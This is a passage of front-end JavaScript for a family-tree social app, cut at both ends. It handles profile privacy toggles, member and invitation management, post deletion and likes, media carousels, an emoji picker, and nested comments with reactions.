                : 'Family members can see their dates, location, and photos.';
            return `
                <div class="mt-6 bg-white rounded-lg shadow-md p-6" data-privacy-person-id="${person.id}" data-privacy-card="deceased">
                    <h3 class="text-lg font-semibold mb-2">Manage privacy</h3>
                    <p class="text-sm text-gray-600 mb-4">
                        You control ${escapeHtml((person.first_name || 'this person').trim())}'s privacy because you added their profile to the tree.
                    </p>
                    <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 p-4 border border-gray-200 rounded-lg">
                        <div class="flex-1">
                            <div class="flex items-center gap-2">
                                <span
                                    id="deceased-privacy-state-label"
                                    class="ebw-privacy-pill ${isPrivate ? 'ebw-privacy-pill-private' : 'ebw-privacy-pill-visible'}"
                                >${stateLabel}</span>
                                <span id="deceased-privacy-saved" class="ebw-privacy-saved" aria-live="polite"></span>
                            </div>
                            <div class="text-sm text-gray-500 mt-2" id="deceased-privacy-state-hint">${escapeHtml(stateHint)}</div>
                        </div>
                        <label class="inline-flex items-center gap-2 cursor-pointer" title="Toggle profile privacy">
                            <span class="text-sm text-gray-600">Private</span>
                            <input
                                id="deceased-privacy-toggle"
                                type="checkbox"
                                ${isPrivate ? 'checked' : ''}
                                onchange="handleDeceasedPrivacyToggle(this)"
                                class="w-5 h-5"
                            />
                        </label>
                    </div>
                    <div id="deceased-privacy-error" class="text-sm text-red-600 mt-3 hidden"></div>
                </div>
            `;
        }

        async function handleDeceasedPrivacyToggle(checkbox) {
            const errEl = document.getElementById('deceased-privacy-error');
            const stateLabel = document.getElementById('deceased-privacy-state-label');
            const stateHint = document.getElementById('deceased-privacy-state-hint');
            const savedEl = document.getElementById('deceased-privacy-saved');
            const container = checkbox && checkbox.closest('[data-privacy-person-id]');
            const personId = container && parseInt(container.getAttribute('data-privacy-person-id'), 10);
            if (!personId) return;
            if (errEl) { errEl.textContent = ''; errEl.classList.add('hidden'); }
            if (savedEl) { savedEl.textContent = ''; savedEl.classList.remove('is-visible'); }
            const nextMode = checkbox.checked ? 'private' : 'visible';
            const prevChecked = !checkbox.checked;
            checkbox.disabled = true;
            try {
                const res = await apiFetch(`${API_BASE_URL}/persons/${personId}/privacy`, {
                    method: 'PATCH',
                    body: { privacy_mode: nextMode },
                });
                const finalMode = (res && res.person && res.person.privacy_mode) || nextMode;
                const isPrivate = finalMode === 'private';
                if (stateLabel) {
                    stateLabel.textContent = isPrivate ? 'Private' : 'Visible to family';
                    stateLabel.classList.remove('ebw-privacy-pill-visible', 'ebw-privacy-pill-private');
                    stateLabel.classList.add(isPrivate ? 'ebw-privacy-pill-private' : 'ebw-privacy-pill-visible');
                }
                if (stateHint) stateHint.textContent = isPrivate
                    ? 'Family members see only their name and how they\'re related.'
                    : 'Family members can see their dates, location, and photos.';
                if (savedEl) {
                    savedEl.innerHTML = '<span aria-hidden="true">✓</span> Saved';
                    savedEl.classList.add('is-visible');
                    clearTimeout(handleDeceasedPrivacyToggle._savedTimer);
                    handleDeceasedPrivacyToggle._savedTimer = setTimeout(() => {
                        savedEl.classList.remove('is-visible');
                    }, 1800);
                }
                window.dispatchEvent(new CustomEvent('ebw:privacy-changed', {
                    detail: { personId, mode: finalMode }
                }));
            } catch (err) {
                checkbox.checked = prevChecked;
                if (errEl) {
                    errEl.textContent = (err && err.message) || 'Could not update privacy. Please try again.';
                    errEl.classList.remove('hidden');
                }
            } finally {
                checkbox.disabled = false;
            }
        }

        async function openPrivacyChangeRequest(personId) {
            const reason = window.prompt(
                "Send a note to the profile controller (optional):",
                ""
            );
            if (reason === null) return;  // Cancel
            try {
                await apiFetch(`${API_BASE_URL}/persons/${personId}/privacy-change-request`, {
                    method: 'POST',
                    body: { reason: (reason || '').trim() },
                });
                alert("Thanks — we've let the profile's controller know.");
            } catch (err) {
                alert((err && err.message) || "Couldn't send the request. Please try again.");
            }
        }

        async function handleManagePrivacyToggle(checkbox) {
            const errEl = document.getElementById('manage-privacy-error');
            const stateLabel = document.getElementById('manage-privacy-state-label');
            const stateHint = document.getElementById('manage-privacy-state-hint');
            const savedEl = document.getElementById('manage-privacy-saved');
            const container = checkbox && checkbox.closest('[data-privacy-person-id]');
            const personId = container && container.getAttribute('data-privacy-person-id');
            if (!personId) return;
            if (errEl) { errEl.textContent = ''; errEl.classList.add('hidden'); }
            if (savedEl) { savedEl.textContent = ''; savedEl.classList.remove('is-visible'); }
            const nextMode = checkbox.checked ? 'private' : 'visible';
            const prevChecked = !checkbox.checked;
            checkbox.disabled = true;
            try {
                const res = await apiFetch(`${API_BASE_URL}/persons/${personId}/privacy`, {
                    method: 'PATCH',
                    body: { privacy_mode: nextMode },
                });
                const finalMode = (res && res.person && res.person.privacy_mode) || nextMode;
                const isPrivate = finalMode === 'private';
                if (stateLabel) {
                    stateLabel.textContent = isPrivate ? 'Private' : 'Visible to family';
                    stateLabel.classList.remove('ebw-privacy-pill-visible', 'ebw-privacy-pill-private');
                    stateLabel.classList.add(isPrivate ? 'ebw-privacy-pill-private' : 'ebw-privacy-pill-visible');
                }
                if (stateHint) stateHint.textContent = isPrivate
                    ? 'Other members see only your name and how you\'re related.'
                    : 'Other members can see your dates, location, and photos.';
                if (savedEl) {
                    savedEl.innerHTML = '<span aria-hidden="true">✓</span> Saved';
                    savedEl.classList.add('is-visible');
                    clearTimeout(handleManagePrivacyToggle._savedTimer);
                    handleManagePrivacyToggle._savedTimer = setTimeout(() => {
                        savedEl.classList.remove('is-visible');
                    }, 1800);
                }
                // Broadcast so any live Person renders can refresh next tick.
                window.dispatchEvent(new CustomEvent('ebw:privacy-changed', {
                    detail: { personId: parseInt(personId, 10), mode: finalMode }
                }));
            } catch (err) {
                checkbox.checked = prevChecked;
                if (errEl) {
                    errEl.textContent = (err && err.message) || 'Could not update privacy. Please try again.';
                    errEl.classList.remove('hidden');
                }
            } finally {
                checkbox.disabled = false;
            }
        }

        async function removeMember(userId, userName) {
            if (!confirm(`Are you sure you want to disconnect from ${escapeHtml(userName)}?\n\nThis will:\n• Remove them from your family tree\n• Remove you from their family tree\n• Delete all family relationships between you`)) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/members/${userId}`, {
                    method: 'DELETE'
                });

                alert('Connection removed successfully');
                await fetchAndRenderMembers(); // Refresh the list
            } catch (error) {
                console.error('Error removing member:', error);
                alert(error.message || 'Failed to remove member');
            }
        }

        async function unblockUser(userId, userName) {
            if (!confirm(`Are you sure you want to unblock ${escapeHtml(userName)}?\n\nThey will be able to send you connection requests again.`)) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/users/${userId}/unblock`, {
                    method: 'POST'
                });

                alert('User unblocked successfully');
                await fetchAndRenderMembers(); // Refresh the list
            } catch (error) {
                console.error('Error unblocking user:', error);
                alert(error.message || 'Failed to unblock user');
            }
        }

        function toggleMemberActions(userId) {
            const dropdown = document.getElementById(`member-actions-${userId}`);
            const allDropdowns = document.querySelectorAll('[id^="member-actions-"]');

            // Close all other dropdowns
            allDropdowns.forEach(d => {
                if (d.id !== `member-actions-${userId}`) {
                    d.classList.add('hidden');
                }
            });

            // Toggle current dropdown
            dropdown.classList.toggle('hidden');
        }

        // Close dropdowns when clicking outside
        document.addEventListener('click', function(event) {
            if (!event.target.closest('[onclick^="toggleMemberActions"]')) {
                const allDropdowns = document.querySelectorAll('[id^="member-actions-"]');
                allDropdowns.forEach(d => d.classList.add('hidden'));
            }
        });

        async function changeRole(userId, currentRole) {
            const roles = ['viewer', 'editor', 'admin'];
            const roleDescriptions = {
                viewer: 'Can view the family tree',
                editor: 'Can view and edit the family tree',
                admin: 'Can view, edit, and manage members'
            };

            // Create a simple prompt for now - we can enhance this later with a modal
            let selectedRole = prompt(
                `Change role for this member:\n\nCurrent role: ${currentRole}\n\nAvailable roles:\n` +
                `- viewer: Can view the family tree\n` +
                `- editor: Can view and edit the family tree\n` +
                `- admin: Can view, edit, and manage members\n\n` +
                `Enter new role (viewer, editor, or admin):`,
                currentRole
            );

            if (!selectedRole || selectedRole === currentRole) {
                return;
            }

            selectedRole = selectedRole.toLowerCase();
            if (!roles.includes(selectedRole)) {
                alert('Invalid role. Please choose viewer, editor, or admin.');
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/manage_role`, {
                    method: 'POST',
                    body: JSON.stringify({
                        user_id_to_add: userId,
                        role: selectedRole
                    })
                });

                alert(`Role updated to ${selectedRole}`);
                await fetchAndRenderMembers(); // Refresh the list
            } catch (error) {
                console.error('Error changing role:', error);
                alert(error.message || 'Failed to change role');
            }
        }

        // 2026-07-21: per-email in-flight guard so double-clicking Resend
        // doesn't fire two concurrent DELETE-then-POST sequences (which
        // could race and leave the tree with an orphan Invitation OR the
        // POST from click #2 racing against click #1's still-in-flight
        // DELETE). Set is cleared on completion regardless of outcome.
        const _resendInviteInFlight = new Set();
        async function resendInvite(email) {
            const key = (email || '').trim().toLowerCase();
            if (!key || _resendInviteInFlight.has(key)) return;
            _resendInviteInFlight.add(key);
            try {
                // First, get the invite ID for this email
                const invitesResponse = await apiFetch(`${API_BASE_URL}/invites`);
                const invites = invitesResponse.invites || [];
                const existingInvite = invites.find(inv => inv.email === email);

                if (existingInvite) {
                    // Delete the old invitation first
                    await apiFetch(`${API_BASE_URL}/invites/${existingInvite.id}`, {
                        method: 'DELETE'
                    });
                }

                // Now create a new invitation
                await apiFetch(`${API_BASE_URL}/invites`, {
                    method: 'POST',
                    body: {
                        email: email,
                        relationship: '',  // Optional field
                        message: 'Resending invitation'
                    }
                });

                alert('Invitation resent successfully');

                // Refresh the members list to show the new invitation
                await fetchAndRenderMembers();
            } catch (error) {
                console.error('Error resending invite:', error);
                alert(error.message || 'Failed to resend invitation');
            } finally {
                _resendInviteInFlight.delete(key);
            }
        }

        async function cancelInvite(inviteId) {
            if (!confirm('Are you sure you want to cancel this invitation?')) {
                return;
            }

            try {
                console.log('Cancelling invite:', inviteId);

                // Delete the invite
                const response = await apiFetch(`${API_BASE_URL}/invites/${inviteId}`, {
                    method: 'DELETE'
                });

                console.log('Delete response:', response);
                alert('Invitation cancelled successfully');

                console.log('Refreshing members list...');
                await fetchAndRenderMembers(); // Refresh the list
                console.log('Members list refreshed');
            } catch (error) {
                console.error('Error cancelling invite:', error);
                alert(error.message || 'Failed to cancel invitation');
            }
        }

        function togglePostMenu(postId) {
            // Close all other open menus first
            document.querySelectorAll('[id^="post-menu-"]').forEach(menu => {
                if (menu.id !== `post-menu-${postId}`) {
                    menu.classList.add('hidden');
                }
            });

            // Toggle this menu
            const menu = document.getElementById(`post-menu-${postId}`);
            if (menu) {
                menu.classList.toggle('hidden');
            }
        }

        function closePostMenu(postId) {
            const menu = document.getElementById(`post-menu-${postId}`);
            if (menu) {
                menu.classList.add('hidden');
            }
        }

        // Close post menus when clicking outside
        document.addEventListener('click', function(event) {
            if (!event.target.closest('[id^="post-menu-"]') && !event.target.closest('button')) {
                document.querySelectorAll('[id^="post-menu-"]').forEach(menu => {
                    menu.classList.add('hidden');
                });
            }
        });

        async function togglePinPost(postId, currentlyPinned) {
            try {
                await apiFetch(`${API_BASE_URL}/posts/${postId}/pin`, {
                    method: 'POST'
                });

                await fetchAndRenderFeed(true, true); // Force refresh after pin toggle
            } catch (error) {
                console.error("Error toggling pin:", error);
                alert("Failed to " + (currentlyPinned ? "unpin" : "pin") + " post: " + error.message);
            }
        }

        function confirmDeletePost(postId) {
            if (confirm('Are you sure you want to delete this post? This action cannot be undone.')) {
                deletePost(postId);
            }
        }

        async function deletePost(postId) {
            // Overlay just this post card with a "Deleting…" spinner. On
            // success we remove the single card from the DOM — no full feed
            // re-fetch (which would blow away every unrelated card + trigger
            // skeletons for a page-level flash). On error we lift the overlay
            // and surface the message.
            const cardEl = document.querySelector(`[data-post-id="${postId}"]`);
            if (cardEl) {
                cardEl.classList.add('ebw-post-deleting');
                const overlay = document.createElement('div');
                overlay.className = 'ebw-post-delete-overlay';
                overlay.setAttribute('role', 'status');
                overlay.setAttribute('aria-live', 'polite');
                overlay.innerHTML = `
                    <span class="ebw-post-delete-spinner" aria-hidden="true"></span>
                    <span class="ebw-post-delete-label">Deleting…</span>
                `;
                cardEl.appendChild(overlay);
            }
            try {
                await apiFetch(`${API_BASE_URL}/posts/${postId}`, {
                    method: 'DELETE'
                });
                if (cardEl) {
                    // Fade + collapse out for ~200ms, then drop the node.
                    cardEl.classList.add('ebw-post-removing');
                    setTimeout(() => {
                        cardEl.remove();
                        // If the feed is empty afterwards, show the empty state.
                        const feedContainer = document.getElementById('feed-container');
                        if (feedContainer && !feedContainer.querySelector('[data-post-id]')) {
                            feedContainer.innerHTML = ebwEmptyState({
                        icon: 'notes',
                        heading: 'Nothing here yet',
                        body: 'Share your first story — a memory, a photo, an ordinary Tuesday. Family members on this tree will see it.',
                        primaryAction: { label: '+ Create a post', onclick: "openModal('create-post-modal')" },
                        learnMoreAnchor: 'posts',
                    });
                        }
                    }, 200);
                }
            } catch (error) {
                console.error("Error deleting post:", error);
                if (cardEl) {
                    cardEl.classList.remove('ebw-post-deleting');
                    cardEl.querySelector('.ebw-post-delete-overlay')?.remove();
                }
                alert("Failed to delete post: " + error.message);
            }
        }

        async function toggleLike(postId, currentlyLiked) {
            try {
                const method = currentlyLiked ? 'DELETE' : 'POST';
                const response = await apiFetch(`${API_BASE_URL}/posts/${postId}/like`, { method });

                // Find the post element
                const postElement = document.querySelector(`[data-post-id="${postId}"]`);
                if (!postElement) return;

                // Update like count
                const likeCountEl = document.getElementById(`like-count-${postId}`);
                if (likeCountEl && response.likeCount !== undefined) {
                    likeCountEl.textContent = response.likeCount;
                }

                // Update like button appearance without re-rendering feed
                const likeButton = postElement.querySelector(`button[onclick*="toggleLike(${postId}"]`);
                if (likeButton) {
                    const likeIcon = likeButton.querySelector('span.text-xl');
                    const newLikedState = !currentlyLiked;

                    // Toggle button classes
                    if (newLikedState) {
                        likeButton.classList.remove('text-gray-500');
                        likeButton.classList.add('text-red-500');
                        if (likeIcon) likeIcon.textContent = '❤️';
                    } else {
                        likeButton.classList.remove('text-red-500');
                        likeButton.classList.add('text-gray-500');
                        if (likeIcon) likeIcon.textContent = '🤍';
                    }

                    // Update onclick handler to reflect new state
                    likeButton.setAttribute('onclick', `toggleLike(${postId}, ${newLikedState})`);
                }
            } catch (error) {
                console.error("Error toggling like:", error);
            }
        }

        // Carousel navigation functions
        const carouselStates = {}; // Store current index for each post carousel

        function navigateCarousel(postId, direction) {
            if (!carouselStates[postId]) {
                carouselStates[postId] = 0;
            }

            // Get all carousel items for this post
            const items = document.querySelectorAll(`[data-carousel-item^="${postId}-"]`);
            const totalItems = items.length;

            if (totalItems === 0) return;

            // Hide current item
            const currentIndex = carouselStates[postId];
            const currentItem = items[currentIndex];

            // Pause video if current item is a video
            if (currentItem.tagName === 'VIDEO') {
                currentItem.pause();
            }

            currentItem.classList.add('hidden');

            // Update dots
            const currentDot = document.querySelector(`[data-carousel-dot="${postId}-${currentIndex}"]`);
            if (currentDot) {
                currentDot.classList.remove('bg-white');
                currentDot.classList.add('bg-white', 'bg-opacity-50');
            }

            // Calculate new index
            let newIndex = currentIndex + direction;
            if (newIndex < 0) newIndex = totalItems - 1;
            if (newIndex >= totalItems) newIndex = 0;

            // Show new item
            items[newIndex].classList.remove('hidden');

            // Update dots
            const newDot = document.querySelector(`[data-carousel-dot="${postId}-${newIndex}"]`);
            if (newDot) {
                newDot.classList.remove('bg-opacity-50');
                newDot.classList.add('bg-white');
            }

            // Update counter
            const counter = document.getElementById(`carousel-counter-${postId}`);
            if (counter) {
                counter.textContent = newIndex + 1;
            }

            // Save state
            carouselStates[postId] = newIndex;
        }

        function jumpToCarouselSlide(postId, slideIndex) {
            if (!carouselStates[postId]) {
                carouselStates[postId] = 0;
            }

            const items = document.querySelectorAll(`[data-carousel-item^="${postId}-"]`);
            if (slideIndex < 0 || slideIndex >= items.length) return;

            // Hide all items
            items.forEach((item, index) => {
                // Pause video if item is a video
                if (item.tagName === 'VIDEO') {
                    item.pause();
                }

                item.classList.add('hidden');

                // Update all dots
                const dot = document.querySelector(`[data-carousel-dot="${postId}-${index}"]`);
                if (dot) {
                    dot.classList.remove('bg-white');
                    dot.classList.add('bg-white', 'bg-opacity-50');
                }
            });

            // Show selected item
            items[slideIndex].classList.remove('hidden');

            // Update selected dot
            const selectedDot = document.querySelector(`[data-carousel-dot="${postId}-${slideIndex}"]`);
            if (selectedDot) {
                selectedDot.classList.remove('bg-opacity-50');
                selectedDot.classList.add('bg-white');
            }

            // Update counter
            const counter = document.getElementById(`carousel-counter-${postId}`);
            if (counter) {
                counter.textContent = slideIndex + 1;
            }

            // Save state
            carouselStates[postId] = slideIndex;
        }

        async function toggleComments(postId) {
            const commentsSection = document.getElementById(`comments-section-${postId}`);
            if (!commentsSection) return;

            if (commentsSection.classList.contains('hidden')) {
                commentsSection.classList.remove('hidden');
                await fetchAndRenderComments(postId);
            } else {
                commentsSection.classList.add('hidden');
            }
        }

        function buildNestedComments(comments) {
            // Build a map of comment ID to comment object with replies array
            const commentMap = new Map();
            const topLevelComments = [];

            // First pass: create map entries
            comments.forEach(comment => {
                commentMap.set(comment.id, { ...comment, replies: [] });
            });

            // Second pass: build tree structure
            comments.forEach(comment => {
                if (comment.parent_comment_id) {
                    // This is a reply
                    const parent = commentMap.get(comment.parent_comment_id);
                    if (parent) {
                        parent.replies.push(commentMap.get(comment.id));
                    }
                } else {
                    // This is a top-level comment
                    topLevelComments.push(commentMap.get(comment.id));
                }
            });

            return topLevelComments;
        }

        // Emoji picker for text inputs and textareas
        function insertEmojiAtCursor(inputId, emoji) {
            const input = document.getElementById(inputId);
            if (!input) return;

            const startPos = input.selectionStart || 0;
            const endPos = input.selectionEnd || 0;
            const textBefore = input.value.substring(0, startPos);
            const textAfter = input.value.substring(endPos);

            input.value = textBefore + emoji + textAfter;

            // Set cursor position after the inserted emoji
            const newCursorPos = startPos + emoji.length;
            input.setSelectionRange(newCursorPos, newCursorPos);
            input.focus();
        }

        function _closeEmojiPicker(picker) {
            if (!picker) return;
            if (typeof picker._cleanupHandlers === 'function') picker._cleanupHandlers();
            picker.remove();
        }

        function showEmojiPickerForInput(inputId, buttonElement) {
            const pickerId = `emoji-picker-for-${inputId}`;
            let picker = document.getElementById(pickerId);

            // Toggle: existing picker → close (re-tap on same trigger).
            if (picker) { _closeEmojiPicker(picker); return; }

            // Close any other open emoji pickers (single-picker semantics).
            document.querySelectorAll('[id^="emoji-picker-for-"]').forEach(_closeEmojiPicker);

            // Below sm: bottom-sheet at the viewport bottom (fixed, full
            // width, capped at 40dvh, scrollable, safe-area padding).
            // Appended to <body> so the modal card's `transform` doesn't
            // become the containing block for `position: fixed` (same
            // trap the RecipientPickerModal hit — see CLAUDE.md rule 8).
            // sm+ keeps the original button-anchored `absolute` picker.
            const isMobile = window.matchMedia('(max-width: 639px)').matches;

            picker = document.createElement('div');
            picker.id = pickerId;

            const emojis = [
                '😀', '😃', '😄', '😁', '😊', '😍', '🥰', '😘',
                '😂', '🤣', '😅', '😆', '😉', '😌', '😔', '😢',
                '😭', '😤', '😡', '🥺', '😱', '😨', '🤔', '🤗',
                '👍', '👎', '👏', '🙌', '🤝', '💪', '🙏', '✨',
                '❤️', '💕', '💖', '💗', '💙', '💚', '💛', '🧡',
                '🎉', '🎊', '🎈', '🎁', '🏆', '⭐', '🌟', '✅',
                '🌍', '🌎', '🌏', '🌳', '🌺', '🌸', '🌼', '🌻',
                '🔥', '💯', '✌️', '🤘', '👌', '👋', '🤚', '🖐️'
            ];

            // Emoji click keeps the picker open — allows multi-insert
            // (matches platform emoji-keyboard convention). Outside-tap
            // or Escape closes it.
            const gridClasses = isMobile
                ? 'grid grid-cols-8 gap-1 w-full'
                : 'grid grid-cols-6 md:grid-cols-8 gap-1 w-64 md:max-w-xs';
            const gridInner = `
                <div class="${gridClasses}">
                    ${emojis.map(emoji => `
                        <button
                            type="button"
                            onclick="event.stopPropagation(); insertEmojiAtCursor('${inputId}', '${emoji}');"
                            class="w-8 h-8 md:w-10 md:h-10 text-lg md:text-xl hover:bg-gray-100 active:bg-gray-200 rounded flex items-center justify-center transition-all">
                            ${emoji}
                        </button>
                    `).join('')}
                </div>
            `;

            if (isMobile) {
                picker.className = 'fixed left-0 right-0 bottom-0 z-[70] bg-white border-t border-gray-200 shadow-2xl px-3 pt-3 safe-area-bottom';
                picker.style.maxHeight = '40dvh';
                picker.style.overflowY = 'auto';
                picker.innerHTML = `
                    <div class="flex items-center justify-between mb-2">
                        <span class="text-xs font-medium text-gray-500 uppercase tracking-wide">Emoji</span>
                        <button type="button" onclick="event.stopPropagation(); document.getElementById('${pickerId}') && document.getElementById('${pickerId}').remove()" class="text-gray-400 hover:text-gray-600 -mr-1 p-1" aria-label="Close">×</button>
                    </div>
                    ${gridInner}
                `;
                document.body.appendChild(picker);
            } else {
                picker.className = 'absolute z-50 mt-1 bg-white border border-gray-200 rounded-lg shadow-lg p-2 max-h-64 overflow-y-auto';
                picker.innerHTML = gridInner;
                buttonElement.parentElement.style.position = 'relative';
                buttonElement.parentElement.appendChild(picker);
            }

            // Outside-tap + Escape close. Same one-shot capture-phase
            // pattern as the multi-tree picker (see toggleFtvTreePicker).
            // The setTimeout(0) defer keeps the opening tap from
            // immediately self-closing via the same event.
            setTimeout(() => {
                const closeOnClick = (ev) => {
                    if (picker.contains(ev.target)) return;
                    if (buttonElement && buttonElement.contains(ev.target)) return;
                    _closeEmojiPicker(picker);
                };
                const closeOnKey = (ev) => {
                    if (ev.key === 'Escape') _closeEmojiPicker(picker);
                };
                document.addEventListener('click', closeOnClick, { capture: true });
                document.addEventListener('keydown', closeOnKey);
                picker._cleanupHandlers = () => {
                    document.removeEventListener('click', closeOnClick, { capture: true });
                    document.removeEventListener('keydown', closeOnKey);
                };
            }, 0);
        }

        function renderCommentReactions(comment, postId) {
            const reactions = comment.reactions || {};
            if (Object.keys(reactions).length === 0) {
                return '';
            }

            const reactionHTML = Object.entries(reactions).map(([emoji, data]) => {
                const count = data.count || 0;
                const users = data.users || [];
                const currentUserReacted = users.some(u => u.id === appState.currentUserNeo4jId);
                const buttonClass = currentUserReacted ? 'bg-blue-100 ring-1 ring-blue-300' : 'bg-gray-100 hover:bg-gray-200';

                // Create tooltip text with user names
                const userNames = users.map(u => u.name).join(', ');
                const title = count === 1 ? userNames : `${count} reactions: ${userNames}`;

                return `
                    <button
                        onclick="reactToComment(${comment.id}, ${postId}, '${emoji}')"
                        class="inline-flex items-center gap-1 px-2 py-0.5 text-xs rounded-full transition-colors ${buttonClass}"
                        title="${title}">
                        <span>${emoji}</span>
                        <span class="font-medium">${count}</span>
                    </button>
                `;
            }).join('');

            return `
                <div class="flex gap-1 mt-2 flex-wrap">
                    ${reactionHTML}
                </div>
            `;
        }

        function showCommentReactionPicker(commentId, postId) {
            const picker = document.getElementById(`reaction-picker-${commentId}`);
            if (!picker) return;

            // Toggle picker
            if (!picker.classList.contains('hidden')) {
                picker.classList.add('hidden');
                picker.innerHTML = '';
                return;
            }

            // Hide all other pickers
            document.querySelectorAll('[id^="reaction-picker-"]').forEach(p => {
                p.classList.add('hidden');
                p.innerHTML = '';
            });

            // Common emoji reactions
            const emojis = ['👍', '❤️', '😂', '😮', '😢', '🙏', '🎉', '🔥'];

            picker.innerHTML = `
                <div class="flex gap-2 p-2 bg-white border border-gray-200 rounded-lg shadow-lg">
                    ${emojis.map(emoji => `
                        <button
                            onclick="reactToComment(${commentId}, ${postId}, '${emoji}'); document.getElementById('reaction-picker-${commentId}').classList.add('hidden');"
                            class="w-10 h-10 text-2xl transition-transform hover:scale-125 hover:bg-gray-100 rounded-lg flex items-center justify-center">
                            ${emoji}
                        </button>
                    `).join('')}
                </div>
            `;
            picker.classList.remove('hidden');
        }

        async function reactToComment(commentId, postId, emoji) {
            try {
                await apiFetch(`${API_BASE_URL}/comments/${commentId}/react`, {
                    method: 'POST',
                    body: { emoji }
                });

                // Refresh comments to show updated reactions
                const comments = await apiFetch(`${API_BASE_URL}/posts/${postId}/comments`);
                const commentsList = document.getElementById(`comments-list-${postId}`);
                if (commentsList) {
                    const nestedComments = buildNestedComments(comments);
                    commentsList.innerHTML = nestedComments.map(comment => renderComment(comment, postId)).join('');
                }
            } catch (error) {
                console.error("Error reacting to comment:", error);
                alert("Failed to add reaction: " + error.message);
            }
        }

        function renderComment(comment, postId, depth = 0) {
            const authorName = comment.author?.name || 'Unknown';
            const commentRelative = formatRelativeTime(comment.createdAt);
            const commentFull = formatFullTimestamp(comment.createdAt);
            const likeCount = comment.likeCount || 0;
            const userLiked = comment.userLiked || false;
            const likeButtonClass = userLiked ? 'text-red-500' : 'text-gray-500';
            const likeIcon = userLiked ? '❤️' : '🤍';
            const isAuthor = comment.author && comment.author.id === appState.currentUserNeo4jId;

            const marginLeft = depth > 0 ? 'ml-4 md:ml-8' : '';

            let html = `
                <div class="flex mb-3 space-x-2 sm:space-x-3 ${marginLeft}" data-comment-id="${comment.id}">
                    <div class="flex items-center justify-center flex-shrink-0 w-7 h-7 sm:w-8 sm:h-8 text-xs sm:text-sm text-white rounded-full bg-primary">
                        ${nameInitials(authorName)}
                    </div>
                    <div class="flex-1">
                        <div class="p-2 sm:p-3 rounded-lg bg-gray-50">
                            <p class="text-sm sm:text-base font-semibold text-gray-800">${authorName}</p>
                            <p class="text-sm sm:text-base text-gray-700">${escapeHtml(comment.content)}</p>
                        </div>
                        <div class="flex flex-wrap items-center mt-1 gap-2 sm:gap-3 text-sm text-gray-500">
                            <span title="${escapeHtml(commentFull)}">${escapeHtml(commentRelative)}</span>
                            <button onclick="toggleCommentLike(${comment.id}, ${postId}, ${userLiked})" class="flex items-center space-x-1 py-1 px-2 -ml-2 sm:-ml-0 rounded transition-colors hover:text-red-500 active:bg-gray-100 ${likeButtonClass}">
                                <span>${likeIcon}</span>
                                <span>${likeCount > 0 ? likeCount : ''}</span>
                            </button>
                            <button onclick="showCommentReactionPicker(${comment.id}, ${postId})" class="py-1 px-2 rounded transition-colors hover:text-primary active:bg-gray-100">React</button>
                            <button onclick="showReplyForm(${comment.id}, ${postId})" class="py-1 px-2 rounded transition-colors hover:text-primary active:bg-gray-100">Reply</button>
                            ${isAuthor ? `<button onclick="confirmDeleteComment(${comment.id}, ${postId})" class="py-1 px-2 rounded transition-colors hover:text-red-600 active:bg-red-50">Delete</button>` : `<button onclick="confirmBlockUser(${comment.author.id}, '${escapeHtml(comment.author.name)}')" class="py-1 px-2 rounded transition-colors hover:text-orange-600 active:bg-orange-50">Block</button>`}
                        </div>
                        ${renderCommentReactions(comment, postId)}
                        <div id="reaction-picker-${comment.id}" class="hidden mt-2"></div>
                        <div id="reply-form-${comment.id}" class="hidden mt-2">
                            <form onsubmit="handleAddComment(event, ${postId}, ${comment.id}); return false;" class="flex flex-col sm:flex-row gap-2">
                                <div class="flex-1 flex gap-2 relative">
                                    <input type="text" id="reply-input-${comment.id}" placeholder="Write a reply..." class="flex-1 px-3 py-2 text-sm border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" />
                                    <button type="button" onclick="showEmojiPickerForInput('reply-input-${comment.id}', this)"
                                        class="px-3 py-2 text-base border border-gray-300 rounded-md hover:bg-gray-100 active:bg-gray-200 transition-colors"
                                        title="Add emoji">
                                        😀
                                    </button>
                                </div>
                                <div class="flex gap-2">
                                    <button type="submit" class="flex-1 sm:flex-none px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90 active:bg-opacity-80">Reply</button>
                                    <button type="button" onclick="hideReplyForm(${comment.id})" class="flex-1 sm:flex-none px-4 py-2 text-sm font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300 active:bg-gray-400">Cancel</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            `;

            // Recursively render replies
            if (comment.replies && comment.replies.length > 0) {
                comment.replies.forEach(reply => {
                    html += renderComment(reply, postId, depth + 1);
                });
            }

            return html;
        }

        async function fetchAndRenderComments(postId) {
            const commentsList = document.getElementById(`comments-list-${postId}`);
            if (!commentsList) return;

            try {
                const comments = await apiFetch(`${API_BASE_URL}/posts/${postId}/comments`);

                if (comments.length === 0) {
                    commentsList.innerHTML = '<p class="text-sm text-center text-gray-500">No comments yet. Be the first to comment!</p>';
                } else {
                    const nestedComments = buildNestedComments(comments);
                    commentsList.innerHTML = nestedComments.map(comment => renderComment(comment, postId)).join('');
                }
            } catch (error) {
                console.error("Error fetching comments:", error);
                commentsList.innerHTML = '<p class="text-sm text-center text-error">Could not load comments.</p>';
            }
        }

        async function handleAddComment(event, postId, parentCommentId = null) {
            event.preventDefault();

            let commentInput;
            if (parentCommentId) {
                // Reply to a comment
                commentInput = document.getElementById(`reply-input-${parentCommentId}`);
            } else {
                // Top-level comment
                commentInput = document.getElementById(`comment-input-${postId}`);
            }

            const content = commentInput.value.trim();

            if (!content) return;

            try {
                const body = { content };
                if (parentCommentId) {
                    body.parent_comment_id = parentCommentId;
                }

                await apiFetch(`${API_BASE_URL}/posts/${postId}/comments`, {
                    method: 'POST',
                    body
                });

                commentInput.value = '';
                if (parentCommentId) {
                    hideReplyForm(parentCommentId);
                }
                await fetchAndRenderComments(postId);

                // Update comment count without re-rendering entire feed
                updateCommentCount(postId);
            } catch (error) {
                console.error("Error adding comment:", error);
                alert("Could not add comment. Please try again.");
            }
        }

        function updateCommentCount(postId) {
            // Find the post in the feed and increment its comment count
            const postElement = document.querySelector(`[data-post-id="${postId}"]`);
            if (postElement) {
                const commentButton = postElement.querySelector(`button[onclick*="toggleComments(${postId})"]`);
                if (commentButton) {
                    const countSpan = commentButton.querySelector('span.text-sm');
                    if (countSpan) {
                        // Extract current count and increment
